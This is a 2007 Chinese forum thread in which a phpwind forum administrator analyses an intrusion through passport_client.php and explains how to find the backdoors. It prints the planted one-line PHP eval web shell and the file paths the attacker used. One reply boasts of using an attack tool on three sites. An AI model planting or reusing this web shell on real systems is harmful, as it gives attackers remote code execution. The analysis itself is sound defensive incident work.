论坛风格切换切换到宽版
  • 6126阅读
  • 12回复

[讨论]本次密码门事件黑客攻击过程简析(含后门查找方法) [复制链接]

上一主题 下一主题
离线michen
 
发帖
9
金钱
278
威望
55
只看楼主 倒序阅读 使用道具 楼主  发表于: 2007-04-07
— 本帖被 GG 执行锁定操作(2007-04-07) —
今天人比较累,不想多写了,也没多研究
刚刚上论坛发现密码被改,就来看了一下,发现是出大BUG了
打了补丁,慢慢分析了一下
大概情况如下:

攻击者IP如下:219.147.205.124 所在的地理位置为: 黑龙江省牡丹江市 电信

攻击者(以下简称JR)首先通过BAIDU查找肉鸡
该JR使用的关键字是  魔兽 公会 powered by phpwind
(估计是想盗号。。)

然后向passport_client.php页面POST了异常数据,测试过我的论坛没有打补丁后
浏览论坛找到我的管理员帐号

再次向passport_client.php页面POST了攻击代码

成功修改了我的管理员密码,进入后台
在论坛默认风格的CSS代码最后加入攻击代码
(具体代码不公布了,就是生成一个data/bbscache/admin_recors.php文件,
里面的内容是:
  1. <?php eval($_POST[a])?>\r\n


后面他还访问了如下地址:
/data/bbscache/admin_recors.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42
/data/bbscache/admin_recors.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42

最后通过
data/bbscache/require.php?action=editfile&dir=.&editfile=admin_record.php
撰改了后台管理记录


简单的说,大家首先要查的,是论坛风格的CSS代码,清除掉,然后再删除上面提到的几个后门文件

累了,还是先休息了,明天有空再仔细研究下。。

最后,还是要欢迎下大家来我的www.yybug.com坐坐,研究些技术,扯扯蛋啥的,呵呵
离线没钱命短

发帖
1247
金钱
267
威望
116
只看该作者 沙发  发表于: 2007-04-07
    知道拉!
离线tjcz
发帖
162
金钱
204
威望
29
只看该作者 板凳  发表于: 2007-04-07
论坛没有开放注册会被黑吗
离线yansb
发帖
74
金钱
516
威望
26
只看该作者 3楼 发表于: 2007-04-07
引用第2楼tjcz于2007-04-07 00:34发表的  :
论坛没有开放注册会被黑吗


会,尽快打上补丁
离线qdducky

发帖
409
金钱
351
威望
25
只看该作者 4楼 发表于: 2007-04-07
楼主辛苦了
离线michen
发帖
9
金钱
278
威望
55
只看该作者 5楼 发表于: 2007-04-07
一发完贴,直接被DDOS了,呵呵,,看来攻击者也不辞辛劳的蹲守在这里哇
 
离线delisure
发帖
278
金钱
340
威望
12
只看该作者 6楼 发表于: 2007-04-07
这个是肯定的
除非是傻子

发帖
8471
金钱
985
威望
33937
只看该作者 7楼 发表于: 2007-04-07
Lz真厉害

☞ 广告推荐区:MARCCASNE(玛卡西尼男装)
☞ 寻找你的环保行动 请加入10000个环保态度 10000td.com  ☜
☞ 时尚 创意 态度  | 中国时尚潮流社区网站: 态度社区
离线jim.ma
发帖
3
金钱
175
威望
1
只看该作者 8楼 发表于: 2007-04-07
分析的不错.
离线布兰加
发帖
85
金钱
181
威望
2
只看该作者 9楼 发表于: 2007-04-07
那么打完补丁就被锁了,怎么办呀?刚打完补丁就发现论坛直接被锁,也就是被黑了。怎么办呀
有米有哪位高手能帮帮忙呀?
离线fable520

发帖
252
金钱
177
威望
29
只看该作者 10楼 发表于: 2007-04-07
admin_record.php 也要删除吗?
离线smubbm1224
发帖
426
金钱
176
威望
28
只看该作者 11楼 发表于: 2007-04-07
请问补丁哪里下载呢
离线xiaodao222
发帖
9
金钱
175
威望
4
只看该作者 12楼 发表于: 2007-04-07
还分析条毛,打好补丁再说,那小破工具我刚才测试了一下,10分钟就搞了3个站
傻瓜式操作,谁发出来的 害人哦